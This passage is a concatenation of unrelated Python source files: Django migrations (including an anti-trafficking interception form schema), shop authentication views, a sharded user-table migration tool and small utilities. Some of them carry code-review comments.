        self.branchingTotal = 0
        self.branchingAve = 0  # kept for backward compatibility (unused here)
        self.expansion = []

    def printStats(self, verbose):
        """Print detailed stats; extra lines for A* search and verbose mode.

        Safe to call even when nothing was expanded (per-node averages
        are undefined in that case, so a notice is printed instead).
        """
        print('------------------------')
        print('SEARCH SUMMARY STATS:')
        print('Search Type: {}. Map file: {} Total Nodes in Graph: {}'.format(self.searchType, self.mapFile, self.totalNodes))
        if self.searchType == 'A*':
            print('Using h-function: {}'.format(self.hfn))
        print('Start node: {} ; Goal node(s): {}'.format(self.startNode, self.goalNode))
        expanded = len(self.expansion)
        if expanded == 0:
            # Guard: averages below divide by the number of expanded nodes.
            print('No nodes were expanded; no further stats available.')
        else:
            print('Searched total of {} nodes out of total of {} in graph'.format(expanded, self.totalNodes))
            print('Ended at Node: {} with path cost: {}'.format(self.expansion[-1], self.endCost))
            print('Path ({}): {}'.format(len(self.endPath), self.endPath))
            print('Frontier size: Average= {:.2f} ; Max size= {}'.format(self.frontierTotal / expanded, self.frontierMax))
            print('Depth of search: Average= {:.2f} ; Max Depth= {}'.format(self.depthTotal / expanded, self.depthMax))
            print('Average branching factor= {:.2f}'.format(self.branchingTotal / expanded))
            if verbose:
                print('Order of Node Expansion: {}'.format(self.expansion))
        print('------------------------')
        print('')

    # Sets start and end goals
    def setStartGoal(self, newStart, newGoal):
        self.startNode = newStart
        self.goalNode = newGoal

    # Updates order of node expansion
    def setExpansion(self, newExpansion):
        self.expansion = newExpansion

    # Sets end cost of search from last node explored
    def setEndCost(self, cost):
        self.endCost = cost

    # Sets end path of search from last node explored
    def setEndPath(self, path):
        self.endPath = path

    # Updates total branching factors to be used in calculating average branching factor
    def updateBranching(self, branching):
        self.branchingTotal = self.branchingTotal + branching

    # Updates total depth factors to be used in calculating average depth factor and max depth
    def updateDepth(self, depth):
        self.depthTotal = self.depthTotal + depth
        if depth > self.depthMax:
            self.depthMax = depth

    # Updates total frontier size to be used in calculating average frontier factor and max frontier
    def updateFrontier(self, frontier):
        self.frontierTotal = self.frontierTotal + frontier
        if frontier > self.frontierMax:
            self.frontierMax = frontier
|
# Generated by Django 3.1.2 on 2020-11-03 18:41
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import pyuploadcare.dj.models
import tinymce.models
class Migration(migrations.Migration):
    """Initial migration for the Hood app: Profile, Post and Comments."""

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('auth', '0012_alter_user_first_name_max_length'),
    ]

    operations = [
        migrations.CreateModel(
            name='Profile',
            fields=[
                # Optional profile picture stored via Uploadcare.
                ('prof_pic', pyuploadcare.dj.models.ImageField(blank=True)),
                ('bio', tinymce.models.HTMLField()),
                # The auth user is the primary key: one profile per user.
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to='auth.user')),
            ],
        ),
        migrations.CreateModel(
            name='Post',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('photo', pyuploadcare.dj.models.ImageField(blank=True)),
                ('post_name', models.CharField(max_length=50)),
                ('post_caption', tinymce.models.HTMLField(blank=True)),
                ('post_date', models.DateTimeField(auto_now=True)),
                # NOTE(review): a single BooleanField cannot count likes per
                # user — presumably a placeholder; verify against the model.
                ('likes', models.BooleanField(default=False)),
                # NOTE(review): named 'profile' but it targets the auth
                # user model, not the Profile model above — confirm intent.
                ('profile', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                # Newest posts first by default.
                'ordering': ('-post_date',),
            },
        ),
        migrations.CreateModel(
            name='Comments',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('comment', tinymce.models.HTMLField()),
                ('posted_on', models.DateTimeField(auto_now=True)),
                ('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Hood.post')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
|
# Generated by Django 2.1.7 on 2019-04-19 20:06
from django.db import migrations, models
class Migration(migrations.Migration):
    """Adds a 'paid' flag to the bill model; bills default to unpaid."""

    dependencies = [
        ('home', '0010_product_img'),
    ]

    operations = [
        migrations.AddField(
            model_name='bill',
            name='paid',
            field=models.BooleanField(default=False),
        ),
    ]
|
#Ask an user to enter a number. Find out if this number is Odd or Even
def odd_even(n):
    """Print whether the integer ``n`` is odd or even.

    Fix: the original only classified strictly positive numbers (the
    ``n > 0`` guard silently ignored zero and negatives).  Parity is
    defined for every integer — zero is even and Python's ``%`` gives a
    non-negative remainder for negative operands — so the guard is gone.
    """
    if n % 2 == 0:
        print(f'{n} is even')
    else:
        print(f'{n} is odd')


if __name__ == "__main__":
    # Guarded so importing this module no longer blocks on input().
    odd_even(int(input("Enter the number : ")))
import requests
from django.shortcuts import get_object_or_404, render, redirect
from django.contrib import messages, auth
from django.contrib.auth.decorators import login_required, user_passes_test
from django.contrib.sites.shortcuts import get_current_site
from django.contrib.auth.tokens import default_token_generator
from django.template.loader import get_template
from django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode
from django.utils.encoding import force_bytes
from django.core.mail import EmailMessage
from carts.views import _cart_id
from carts.models import Cart, CartItem
from orders.models import Order, OrderProduct
from .forms import RegistrationForm, UserForm, UserProfileForm
from .models import User, UserProfile
@user_passes_test(lambda user: not user.is_authenticated, login_url='home')
def register(request):
    """Create a new user account and e-mail an activation link.

    GET renders an empty registration form; a valid POST creates the
    User (username derived from the e-mail local part), a default
    UserProfile, then sends an HTML activation e-mail carrying a signed
    uid/token pair, and redirects back to the registration page.
    """
    if request.method == 'POST':
        form = RegistrationForm(request.POST)
        if form.is_valid():
            firstname = form.cleaned_data['firstname']
            lastname = form.cleaned_data['lastname']
            phone_number = form.cleaned_data['phone_number']
            email = form.cleaned_data['email']
            password = form.cleaned_data['password']
            # The part of the e-mail before '@' doubles as the username.
            username = email.split('@')[0]
            user = User.objects.create_user(
                email=email,
                password=password,
                phone_number=phone_number,
                firstname=firstname,
                lastname=lastname,
                username=username
            )
            # NOTE(review): create_user typically persists the user
            # already, so this save() looks redundant — confirm against
            # the custom User manager.
            user.save()
            # create user profile
            profile = UserProfile()
            profile.user = user
            profile.profile_picture = 'default/default-user.png'
            profile.save()
            # Build and send the account-activation e-mail.
            current_site = get_current_site(request)
            mail_subject = 'Account Activation'
            message = get_template('users/account_activation_email.html').render({
                'user': user,
                'domain': current_site,
                'uid': urlsafe_base64_encode(force_bytes(user.pk)),
                'token': default_token_generator.make_token(user)
            })
            send_email = EmailMessage(mail_subject, message, to=[email])
            send_email.content_subtype = 'html'
            send_email.send()
            messages.success(
                request, 'User registered successfully! \
                Please check your email to activate your account')
            return redirect('register')
    else:
        form = RegistrationForm()
    context = {
        'form': form,
    }
    return render(request, 'users/register.html', context)
@user_passes_test(lambda user: not user.is_authenticated, login_url='home')
def login(request):
    """Authenticate a user, merging any anonymous-session cart into theirs.

    On success redirects to the 'next' query parameter found in the
    referer URL when present, otherwise to the dashboard.  On bad
    credentials redirects back to the login page with an error.

    Fixes relative to the original:
    - bare ``except:`` clauses narrowed to ``except Exception`` so
      SystemExit/KeyboardInterrupt are no longer swallowed;
    - previously, a referer query string without a 'next' parameter fell
      through and re-rendered the login page even though the user was
      already logged in — it now falls back to the dashboard.
    """
    if request.method == 'POST':
        email = request.POST.get('email')
        password = request.POST.get('password')
        user = auth.authenticate(email=email, password=password)
        if user is not None:
            try:
                cart = Cart.objects.get(cart_id=_cart_id(request))
                is_cart_item_exists = CartItem.objects.filter(
                    cart=cart).exists()
                if is_cart_item_exists:
                    # Variation sets and quantities of the anonymous items.
                    cart_items = CartItem.objects.filter(cart=cart)
                    product_variations = []
                    product_quantities = []
                    for cart_item in cart_items:
                        variations = cart_item.variations.all()
                        product_variations.append(list(variations))
                        product_quantities.append(cart_item.quantity)
                    # Variation sets already in the user's own cart.
                    cart_items = CartItem.objects.filter(user=user)
                    ex_var_list = []
                    items_ids = []
                    for item in cart_items:
                        ex_var_list.append(list(item.variations.all()))
                        items_ids.append(item.id)
                    for product_variation in product_variations:
                        if product_variation in ex_var_list:
                            # Same product/variations already present:
                            # merge by adding the quantities together.
                            index = ex_var_list.index(product_variation)
                            item_id = items_ids[index]
                            item = CartItem.objects.get(id=item_id)
                            item.quantity += product_quantities[
                                product_variations.index(product_variation)]
                            item.user = user
                            item.save()
                        else:
                            # NOTE(review): get(cart=cart) raises
                            # MultipleObjectsReturned when the anonymous
                            # cart holds several items — confirm intent.
                            item = CartItem.objects.get(cart=cart)
                            item.user = user
                            item.save()
            except Exception:
                # No anonymous cart to merge (or merge failed); login
                # itself must still proceed.
                pass
            auth.login(request, user)
            messages.success(request, 'You are now logged in')
            url = request.META.get('HTTP_REFERER')
            try:
                query = requests.utils.urlparse(url).query
                params = dict(x.split('=') for x in query.split('&'))
                if 'next' in params:
                    return redirect(params['next'])
            except Exception:
                # Malformed/absent query string: fall through to the
                # dashboard redirect below.
                pass
            return redirect('dashboard')
        else:
            messages.error(request, 'Invalid credentials')
            return redirect('login')
    return render(request, 'users/login.html')
@login_required(login_url='login')
def logout(request):
    """Log the current user out and return them to the login page."""
    auth.logout(request)
    messages.success(request, 'You are now logged out')
    return redirect('login')
def activate(request, uidb64, token):
    """Activate an account from the e-mailed confirmation link.

    Decodes the base64-encoded user pk and verifies the token; any
    decoding or lookup failure is treated as an invalid link and sends
    the visitor back to registration.
    """
    try:
        uid = urlsafe_base64_decode(uidb64).decode()
        user = User.objects.get(pk=uid)
    except(TypeError, ValueError, OverflowError, User.DoesNotExist):
        user = None
    if user is not None and default_token_generator.check_token(user, token):
        user.is_active = True
        user.save()
        messages.success(
            request, 'Congratulations! Your account is successfully activated')
        return redirect('login')
    else:
        messages.error(request, 'Invalid activation link')
        return redirect('register')
@login_required(login_url='login')
def dashboard(request):
    """Render the user's dashboard with their completed-order count and
    profile."""
    completed_orders = Order.objects.order_by('-created_at').filter(
        user=request.user, is_ordered=True)
    user_profile = UserProfile.objects.get(user=request.user)
    return render(request, 'users/dashboard.html', {
        'orders_count': completed_orders.count(),
        'profile': user_profile,
    })
@user_passes_test(lambda user: not user.is_authenticated, login_url='home')
def forgot_password(request):
    """E-mail a password-reset link to a registered address.

    POST with a known e-mail sends an HTML message containing a signed
    uid/token pair; unknown addresses produce an error.  GET renders the
    form.  NOTE(review): telling the visitor whether an address exists
    leaks account presence — consider a uniform response.
    """
    if request.method == 'POST':
        email = request.POST.get('email')
        user_exists = User.objects.filter(email=email).exists()
        if user_exists:
            user = User.objects.get(email__exact=email)
            # Build and send the reset e-mail with a signed uid/token.
            current_site = get_current_site(request)
            mail_subject = 'Reset Password'
            message = get_template('users/reset_password_email.html').render({
                'user': user,
                'domain': current_site,
                'uid': urlsafe_base64_encode(force_bytes(user.pk)),
                'token': default_token_generator.make_token(user)
            })
            send_email = EmailMessage(mail_subject, message, to=[email])
            send_email.content_subtype = 'html'
            send_email.send()
            messages.success(request, 'Link sent successfully! \
            Please check your email to continue')
            return redirect('forgot_password')
        else:
            messages.error(request, 'User with the given email does not exist')
            return redirect('forgot_password')
    return render(request, 'users/forgot_password.html')
def reset_password_validate(request, uidb64, token):
    """Validate a password-reset link; on success remember the target
    user's pk in the session and send the visitor to the reset form."""
    try:
        uid = urlsafe_base64_decode(uidb64).decode()
        user = User.objects.get(pk=uid)
    except (TypeError, ValueError, OverflowError, User.DoesNotExist):
        user = None
    # Guard clause: any decode/lookup/token failure means an invalid link.
    if user is None or not default_token_generator.check_token(user, token):
        messages.error(request, 'Invalid reset password link')
        return redirect('forgot_password')
    request.session['uid'] = uid
    messages.success(request, 'Please reset your password')
    return redirect('reset_password')
@user_passes_test(lambda user: not user.is_authenticated, login_url='home')
def reset_password(request):
    """Set a new password for the user whose pk was stored in the session
    by reset_password_validate.

    Requires matching password/confirm_password fields; on success sends
    the user to the login page.
    """
    if request.method == 'POST':
        password = request.POST.get('password')
        confirm_password = request.POST.get('confirm_password')
        if password == confirm_password:
            # pk stashed by reset_password_validate after token check.
            uid = request.session.get('uid')
            user = User.objects.get(pk=uid)
            user.set_password(password)
            user.save()
            messages.success(request, 'Password reset successfully')
            return redirect('login')
        else:
            messages.error(request, 'Passwords do not match')
            return redirect('reset_password')
    return render(request, 'users/reset_password.html')
@login_required(login_url='login')
def my_orders(request):
    """List the logged-in user's completed orders, newest first."""
    completed_orders = Order.objects.order_by('-created_at').filter(
        user=request.user, is_ordered=True)
    return render(request, 'users/my_orders.html',
                  {'orders': completed_orders})
@login_required(login_url='login')
def edit_profile(request):
    """Edit the user's account fields and profile (including the uploaded
    profile picture via request.FILES).

    Invalid POSTs fall through and re-render the page with the bound
    forms so field errors are displayed.
    """
    user_profile = get_object_or_404(UserProfile, user=request.user)
    if request.method == 'POST':
        user_form = UserForm(request.POST, instance=request.user)
        profile_form = UserProfileForm(request.POST, request.FILES, instance=user_profile)
        if user_form.is_valid() and profile_form.is_valid():
            user_form.save()
            profile_form.save()
            messages.success(request, 'Your profile has been updated successfully')
            return redirect('dashboard')
    else:
        user_form = UserForm(instance=request.user)
        profile_form = UserProfileForm(instance=user_profile)
    context = {
        'user_form': user_form,
        'profile_form': profile_form,
        'user_profile': user_profile
    }
    return render(request, 'users/edit_profile.html', context)
@login_required(login_url='login')
def change_password(request):
    """Change the logged-in user's password after verifying the current
    one.

    Success redirects to the dashboard; a wrong current password
    redirects back here; mismatched new passwords fall through and
    re-render the form with an error message.
    """
    if request.method == 'POST':
        # NOTE(review): direct indexing raises KeyError (HTTP 500) when a
        # field is missing from the POST body — consider .get().
        current_password = request.POST['current_password']
        new_password = request.POST['new_password']
        confirm_password = request.POST['confirm_password']
        user = User.objects.get(username__exact=request.user.username)
        if new_password == confirm_password:
            success = user.check_password(current_password)
            if success:
                user.set_password(new_password)
                user.save()
                # NOTE(review): set_password changes the session auth
                # hash, which may log the user out here — confirm.
                messages.success(request, 'Your password has been updated successfully')
                return redirect('dashboard')
            else:
                messages.error(request, 'Please enter valid current password')
                return redirect('change_password')
        else:
            messages.error(request, 'Passwords do not match')
    return render(request, 'users/change_password.html')
@login_required(login_url='login')
def order_details(request, order_id):
    """Show one order's line items together with the computed subtotal."""
    order_products = OrderProduct.objects.filter(order__order_number=order_id)
    order = Order.objects.get(order_number=order_id)
    # sum() over an empty queryset yields 0, matching the old loop.
    sub_total = sum(
        item.product_price * item.quantity for item in order_products)
    return render(request, 'users/order_details.html', {
        'order_products': order_products,
        'order': order,
        'subtotal': sub_total,
    })
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import os
import sys
import time
import datetime
from tool_base import ToolBase
import config.adx as configAdx
import config.db as configDb
import binascii
class toolNewUser(ToolBase):
    """Migrates rows from the legacy new-user table into sharded user_N
    tables, deleting each migrated row from the legacy table.

    Python 2 code (note the ``except Exception, e`` syntax in run()).
    """

    cutTableNum = configAdx.USER_TABLE_COUNTS  # number of shard tables
    cutTable_pr = "user_"  # shard table name prefix
    limit_count = 2000  # configAdx.LIMIT_COUNTS  # rows fetched per batch
    dataLenght = 0  # size of the last fetched batch (sic: "Lenght")

    def init(self):
        # Legacy source table plus the two database connections.
        self.old_user_table = "intergration_report_new_user"
        self.dbNewUserDataDB = self.initDb(configDb.MYSQL_MOBGI_USER)
        self.dbOldUserDataDB = self.initDb(configDb.MYSQL_MOBGI_DATA_OLD)

    def checkCondition(self, startPosition):
        # True while data at/after startPosition may still exist.
        if startPosition < self.lastPosition:
            return True
        # Probe the boundary: newest created_at in the legacy table
        # (ordered descending, take one row).
        sql = "select created_at from %s order by created_at desc limit 0,1 " % (self.old_user_table)
        result = self.dbOldUserDataDB.fetchone(sql)
        if result is None:
            return False
        else:
            self.lastPosition = int(time.mktime(result['created_at'].timetuple()))
            return startPosition <= self.lastPosition

    # Fetch one batch of legacy rows, oldest first.
    def getRecordList(self):
        sql = "select * from %s order by created_at limit %s" % (self.old_user_table, self.limit_count)
        result, self.dataLenght = self.dbOldUserDataDB.fetchall(sql)
        if self.dataLenght > 0:
            self.nextPosition = int(time.mktime(result[0]['created_at'].timetuple()))
            return result
        else:
            return False

    # Insert the batch into the shard tables, then delete originals.
    def addFromoldTable(self, data):
        inserData = {}  # shard id -> list of row tuples to insert
        delData = []    # (app_key, uuid) pairs to delete from the legacy table
        for value in data:
            tableId = self.cutTable(value['uuid'])
            if tableId not in inserData:
                inserData[tableId] = []
            createDate, createTime = self.dateTimeToFormat(str(value['created_at']))
            inserData[tableId].append((value['app_key'], value['uuid'], createDate, createTime, value['bitmap'], createDate))
            delData.append({
                'app_key': value['app_key'],
                'uuid': value['uuid']
            })
        self.info('inserData')
        for tableId in inserData:
            tableName = self.cutTable_pr + str(tableId)
            # Upsert: existing (app_key, uuid) rows get create_date refreshed.
            sql = "insert into " + tableName + " (app_key,uuid,channel_gid,create_date,create_time,bitmap) " \
                  "values (%s,%s,0,%s,%s,%s) on duplicate key update create_date=%s"
            result = self.dbNewUserDataDB.executeMany(sql, inserData[tableId])
            if result is False:
                return False
        self.info('delData')
        for item in delData:
            delcheck = self.delOldTableData(item['uuid'], item['app_key'])
        return True

    # Split "YYYY-mm-dd HH:MM:SS" into separate date and time strings.
    def dateTimeToFormat(self, dateTime):
        timeArray = time.strptime(dateTime, "%Y-%m-%d %H:%M:%S")
        createDate = time.strftime("%Y-%m-%d", timeArray)
        createTime = time.strftime("%H:%M:%S", timeArray)
        return createDate, createTime

    # Delete one migrated row from the legacy table.
    # NOTE(review): uuid/appKey are interpolated straight into the SQL
    # string — injectable if they can contain quotes; prefer
    # parameterized queries.
    def delOldTableData(self, uuid, appKey):
        sql = "delete from %s where uuid='%s' and app_key='%s'" % (self.old_user_table, uuid, appKey)
        return self.dbOldUserDataDB.execute(sql)

    # Sharding strategy: CRC32 of the uuid modulo the shard count.
    def cutTable(self, uuid):
        # tableNo = binascii.crc32(uuid) % self.cutTableNum
        # return self.cutTable_pr + '_' + str(tableNo)
        return binascii.crc32(uuid) % self.cutTableNum

    def run(self, lastPosition):
        # One migration pass: check for data, fetch a batch, insert into
        # the shards (deleting originals), then advance the position.
        try:
            startTimeStamp = time.time()
            self.lastPosition = lastPosition
            self.startPosition, status = self.getStartPosition()
            if self.checkCondition(self.startPosition) is not True:
                self.dataLenght = 0
                self.info("No data")
                return False
            # Parse and save the batch.
            self.info("startPosition:" + str(datetime.datetime.fromtimestamp(self.startPosition)))
            recordList = self.getRecordList()
            if self.addFromoldTable(recordList) is not True:
                self.dataLenght = 0
                self.info("save Data error!")
            else:
                self.updatePosition()
            self.info("use time : " + str(time.time() - startTimeStamp))
        except Exception, e:
            self.error("run error:" + str(e))
if __name__ == '__main__':
    # Daemon loop: build the tool and run one migration pass per
    # iteration, sleeping when idle or on error and quitting after too
    # many consecutive idle/error rounds.
    sleepCount = 0
    lastPosition = 0
    while 1:
        obj = toolNewUser('tool_new_user')
        if obj.errorFlag:
            obj = None
            time.sleep(configAdx.SLEEP_SECOND)
            continue
        if sleepCount > 10:  # too many consecutive errors: quit
            obj.error("too many error to quit")
            break
        # NOTE(review): errorFlag was already handled (with continue)
        # above, so this branch looks unreachable — and if it ever ran,
        # obj would be None at the obj.run() call below.  Confirm.
        if obj.errorFlag:
            obj = None
            time.sleep(configAdx.SLEEP_SECOND)
            sleepCount += 1
        obj.run(lastPosition)
        lastPosition = obj.lastPosition
        if obj.dataLenght == 0:
            # Nothing migrated this round: count it and back off.
            sleepCount += 1
            obj.info("zzz")
            obj = None
            time.sleep(configAdx.SLEEP_SECOND)
        else:
            sleepCount = 0
|
# coding = utf-8
"""
@author: sy
@file: sql_items.py
@time: 2018/11/15 21:14
@desc: 根据不同的需求定制不同类的自定义sql
"""
# DouBan custom SQL statements
class DouBanSqlItems(object):
    """Custom SQL statements for the DouBan comment data."""

    def get_select_sql(self):
        """Return the SQL that selects all short comments."""
        return "SELECT t.short_comment from douban t"
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2019-11-01 13:18
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration adding the Cambodia-specific IRF models:
    IrfCambodia (the interception record form), IntercepteeCambodia and
    IrfAttachmentCambodia, plus their foreign keys. Generated code — do
    not hand-edit field definitions; create a new migration instead.
    """
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('dataentry', '0118_auto_20191028_1425'),
    ]
    operations = [
        migrations.CreateModel(
            name='IntercepteeCambodia',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('photo', models.ImageField(blank=True, default='', upload_to='interceptee_photos')),
                ('anonymized_photo', models.CharField(max_length=126, null=True)),
                ('kind', models.CharField(choices=[('v', 'Victim'), ('t', 'Trafficker'), ('u', 'Unknown')], max_length=4)),
                ('relation_to', models.CharField(blank=True, max_length=255)),
                ('trafficker_taken_into_custody', models.BooleanField(default=False, verbose_name='taken_into_custody')),
            ],
            options={
                'ordering': ['id'],
            },
        ),
        migrations.CreateModel(
            name='IrfAttachmentCambodia',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('attachment_number', models.PositiveIntegerField(blank=True, null=True)),
                ('description', models.CharField(max_length=126, null=True)),
                ('attachment', models.FileField(upload_to='scanned_irf_forms', verbose_name='Attach scanned copy of form (pdf or image)')),
                ('private_card', models.BooleanField(default=True)),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='IrfCambodia',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('status', models.CharField(default='pending', max_length=20, verbose_name='Status')),
                ('date_time_entered_into_system', models.DateTimeField(auto_now_add=True)),
                ('date_time_last_updated', models.DateTimeField(auto_now=True)),
                ('irf_number', models.CharField(max_length=20, unique=True, verbose_name='IRF #:')),
                ('number_of_victims', models.PositiveIntegerField(blank=True, null=True, verbose_name='# of victims:')),
                ('location', models.CharField(max_length=255, verbose_name='Location:')),
                ('date_time_of_interception', models.DateTimeField(verbose_name='Date/Time:')),
                ('number_of_traffickers', models.PositiveIntegerField(blank=True, null=True, verbose_name='# of traffickers')),
                ('staff_name', models.CharField(max_length=255, verbose_name='Staff Name:')),
                ('drugged_or_drowsy', models.BooleanField(default=False, verbose_name='Girl appears drugged or drowsy')),
                ('who_in_group_husbandwife', models.BooleanField(default=False, verbose_name='Husband / Wife')),
                ('married_in_past_2_weeks', models.BooleanField(default=False, verbose_name='Married in the past 2 weeks')),
                ('married_in_past_2_8_weeks', models.BooleanField(default=False, verbose_name='Married within the past 2-8 weeks')),
                ('caught_in_lie', models.BooleanField(default=False, verbose_name='Caught in a lie or contradiction')),
                ('other_red_flag', models.CharField(blank=True, max_length=255)),
                ('where_going_destination', models.CharField(blank=True, max_length=126, verbose_name='Location:')),
                ('where_going_job', models.BooleanField(default=False, verbose_name='Job')),
                ('passport_with_broker', models.BooleanField(default=False, verbose_name='Passport is with a broker')),
                ('job_too_good_to_be_true', models.BooleanField(default=False, verbose_name='Job is too good to be true')),
                ('not_real_job', models.BooleanField(default=False, verbose_name='Not a real job')),
                ('couldnt_confirm_job', models.BooleanField(default=False, verbose_name='Could not confirm job')),
                ('where_going_study', models.BooleanField(default=False, verbose_name='Study')),
                ('no_enrollment_docs', models.BooleanField(default=False, verbose_name='No documentation of enrollment')),
                ('doesnt_know_school_name', models.BooleanField(default=False, verbose_name="Does not Know School's Name and location")),
                ('no_school_phone', models.BooleanField(default=False, verbose_name='No phone number for School')),
                ('not_enrolled_in_school', models.BooleanField(default=False, verbose_name='Not enrolled in school')),
                ('where_runaway', models.BooleanField(default=False, verbose_name='Runaway')),
                ('running_away_over_18', models.BooleanField(default=False, verbose_name='Running away from home (18 years or older)')),
                ('running_away_under_18', models.BooleanField(default=False, verbose_name='Running away from home (under 18 years old)')),
                ('reluctant_family_info', models.BooleanField(default=False, verbose_name='Reluctant to give family info')),
                ('refuses_family_info', models.BooleanField(default=False, verbose_name='Will not give family info')),
                ('under_18_cant_contact_family', models.BooleanField(default=False, verbose_name='No family contact established')),
                ('under_18_family_doesnt_know', models.BooleanField(default=False, verbose_name="Family doesn't know she is going to India")),
                ('under_18_family_unwilling', models.BooleanField(default=False, verbose_name='Family unwilling to let her go')),
                ('talked_to_family_member', models.CharField(blank=True, max_length=127)),
                ('reported_total_red_flags', models.IntegerField(blank=True, null=True, verbose_name='Reported Total Red Flag Points:')),
                ('computed_total_red_flags', models.IntegerField(blank=True, null=True, verbose_name='Computed Total Red Flag Points:')),
                ('who_noticed', models.CharField(max_length=127, null=True)),
                ('staff_who_noticed', models.CharField(blank=True, max_length=255, verbose_name='Staff who noticed:')),
                ('type_of_intercept', models.CharField(max_length=127, null=True)),
                ('how_sure_was_trafficking', models.IntegerField(choices=[(1, '1 - Not at all sure'), (2, '2 - Unsure but suspects it'), (3, '3 - Somewhat sure'), (4, '4 - Very sure'), (5, '5 - Absolutely sure')], null=True, verbose_name='How sure are you that it was trafficking case?')),
                ('convinced_by_staff', models.CharField(blank=True, max_length=127)),
                ('convinced_by_family', models.CharField(blank=True, max_length=127)),
                ('convinced_by_police', models.CharField(blank=True, max_length=127)),
                ('evidence_categorization', models.CharField(max_length=127, null=True)),
                ('reason_for_intercept', models.TextField(blank=True, verbose_name='Primary reason for intercept')),
                ('has_signature', models.BooleanField(default=False, verbose_name='Scanned form has signature?')),
                ('logbook_received', models.DateField(null=True)),
                ('logbook_incomplete_questions', models.CharField(blank=True, max_length=127)),
                ('logbook_incomplete_sections', models.CharField(blank=True, max_length=127)),
                ('logbook_information_complete', models.DateField(null=True)),
                ('logbook_notes', models.TextField(blank=True, verbose_name='Logbook Notes')),
                ('logbook_submitted', models.DateField(null=True)),
                ('logbook_first_verification', models.CharField(blank=True, max_length=127)),
                ('logbook_first_reason', models.TextField(blank=True, verbose_name='First Reason')),
                ('logbook_followup_call', models.CharField(blank=True, max_length=127)),
                ('logbook_first_verification_date', models.DateField(null=True)),
                ('logbook_leadership_review', models.CharField(blank=True, max_length=127)),
                ('logbook_second_verification', models.CharField(blank=True, max_length=127)),
                ('logbook_second_reason', models.TextField(blank=True, verbose_name='Second Reason')),
                ('logbook_second_verification_date', models.DateField(null=True)),
                ('logbook_back_corrected', models.TextField(blank=True, verbose_name='Back Corrected')),
                ('who_in_group_alone', models.BooleanField(default=False, verbose_name='Alone')),
                ('who_in_group_relative', models.BooleanField(default=False, verbose_name='Own brother, sister / relative')),
                ('who_in_group_broker', models.BooleanField(default=False, verbose_name='Broker/Other Person')),
                ('meeting_someone_across_border', models.BooleanField(default=False, verbose_name='Is meeting a someone just across border')),
                ('meeting_someone_they_dont_know', models.BooleanField(default=False, verbose_name="Supposed to meet someone they don't know")),
                ('crossing_border_separately', models.BooleanField(default=False, verbose_name='Someone who is crossing border separately')),
                ('agent_sent_them_on', models.BooleanField(default=False, verbose_name='An agent who sent them on')),
                ('relationship_married_two_months', models.BooleanField(default=False, verbose_name='During the past 2 months')),
                ('different_ethnicities', models.BooleanField(default=False, verbose_name='Appear to be of different ethnicities')),
                ('thailand_destination', models.CharField(blank=True, max_length=127)),
                ('malaysia_destination', models.CharField(blank=True, max_length=127)),
                ('where_going_other', models.CharField(blank=True, max_length=127)),
                ('work_sector_agriculture', models.BooleanField(default=False, verbose_name='Agriculture')),
                ('work_sector_construction', models.BooleanField(default=False, verbose_name='Construction')),
                ('work_sector_domestic_service', models.BooleanField(default=False, verbose_name='Domestic Services')),
                ('work_sector_dont_know', models.BooleanField(default=False, verbose_name="Don't know")),
                ('work_sector_factory', models.BooleanField(default=False, verbose_name='Factory')),
                ('work_sector_fishing', models.BooleanField(default=False, verbose_name='Fishing')),
                ('work_sector_hospitality', models.BooleanField(default=False, verbose_name='Hospitality')),
                ('work_sector_logging', models.BooleanField(default=False, verbose_name='Logging')),
                ('work_sector_other', models.CharField(blank=True, max_length=127)),
                ('no_company_phone', models.BooleanField(default=False, verbose_name='No company phone number')),
                ('job_confirmed', models.BooleanField(default=False, verbose_name='job confirmed')),
                ('valid_id_or_enrollment_documents', models.BooleanField(default=False, verbose_name='Valid ID card or enrollment documents')),
                ('enrollment_confirmed', models.BooleanField(default=False, verbose_name='Enrollment confirmed')),
                ('purpose_for_going_other', models.CharField(blank=True, max_length=127)),
                ('took_out_loan', models.CharField(blank=True, max_length=127)),
                ('recruited_broker', models.BooleanField(default=False, verbose_name='Broker/Agent')),
                ('how_recruited_broker_approached', models.BooleanField(default=False, verbose_name='Broker approached them')),
                ('met_broker_through_advertisement', models.BooleanField(default=False, verbose_name='Through advertisment')),
                ('met_broker_online', models.CharField(blank=True, max_length=127)),
                ('how_recruited_broker_other', models.CharField(blank=True, max_length=127)),
                ('broker_company', models.CharField(blank=True, max_length=127)),
                ('unwilling_to_give_info_about_broker', models.BooleanField(default=False, verbose_name='unwilling to give information about them')),
                ('initial_signs', models.TextField(blank=True, verbose_name='Initial Signs')),
                ('case_notes', models.TextField(blank=True, verbose_name='Case Notes')),
                ('broker', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='dataentry.Person')),
                ('form_entered_by', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='irfcambodia_entered_by', to=settings.AUTH_USER_MODEL)),
                ('station', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='dataentry.BorderStation')),
                ('where_going_doesnt_know', models.BooleanField(default=False, verbose_name="Don't know where going")),
                ('expected_earning', models.CharField(blank=True, max_length=127)),
